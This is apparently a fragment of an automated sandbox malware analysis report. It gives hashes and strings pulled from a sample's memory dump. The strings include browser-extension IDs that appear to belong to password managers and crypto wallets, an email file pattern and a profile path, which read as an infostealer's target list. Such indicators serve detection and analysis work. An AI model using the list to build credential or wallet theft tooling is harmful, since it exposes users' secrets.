                                                                                                                                            • API String ID: 0-3779506016
                                                                                                                                            • Opcode ID: 582338fe2b8336528323320cfc5a778c542c91b4d4c9e645413adcfe698aa251
                                                                                                                                            • Instruction ID: d7125680f5783dc32a38ff735665dd7b03d7511991862ad267af318c28f880a4
                                                                                                                                            • Opcode Fuzzy Hash: 582338fe2b8336528323320cfc5a778c542c91b4d4c9e645413adcfe698aa251
                                                                                                                                            • Instruction Fuzzy Hash: 4B7146A640E3C10FE7034B749C7A6917FB09F13218B1E45DBC8D0CF2A3D618985ADB26
                                                                                                                                            Strings
                                                                                                                                            • Important Files/Profile/Music, xrefs: 00C922BA
                                                                                                                                            • hdokiejnpimakedhajhdlcegeplioahd, xrefs: 00C9227E
                                                                                                                                            • aeblfdkhhhdcdjpifhhbdiojplfjncoa, xrefs: 00C922A3
                                                                                                                                            • amkmjjmmflddogmhpjloimipbofnfjih, xrefs: 00C921A6
                                                                                                                                            • ejbalbakoplchlghecdalmeeeajnimhm, xrefs: 00C922AE
                                                                                                                                            • lgmpcpglpngdoalbgeoldeajfclnhafa, xrefs: 00C92266
                                                                                                                                            • *.EML, xrefs: 00C9226E
                                                                                                                                            • fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00C9221E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000003.2605530053.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Offset: 00C85000, based on PE: false
                                                                                                                                            • Associated: 00000007.00000003.2568225666.0000000000C85000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_3_c85000_0tClIDb.2.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: *.EML$Important Files/Profile/Music$aeblfdkhhhdcdjpifhhbdiojplfjncoa$amkmjjmmflddogmhpjloimipbofnfjih$ejbalbakoplchlghecdalmeeeajnimhm$fnjhmkhhmkbjkkabndcnnogagogbneec$hdokiejnpimakedhajhdlcegeplioahd$lgmpcpglpngdoalbgeoldeajfclnhafa
                                                                                                                                            • API String ID: 0-3692001205
                                                                                                                                            • Opcode ID: 988042b20bd2c76e8da765ab0c3bff6ed82ee8a9b7777c64b055586f33928a8d
                                                                                                                                            • Instruction ID: 232ab18f6b9d1d74f78d208e8b1720eab0c81588202530cdf6a7cffb6ce83746
                                                                                                                                            • Opcode Fuzzy Hash: 988042b20bd2c76e8da765ab0c3bff6ed82ee8a9b7777c64b055586f33928a8d
                                                                                                                                            • Instruction Fuzzy Hash: DD4108A640E3C14FE7034B749C7A691BFB09F13218B5E49DBC4C0CF2A3D218984ADB26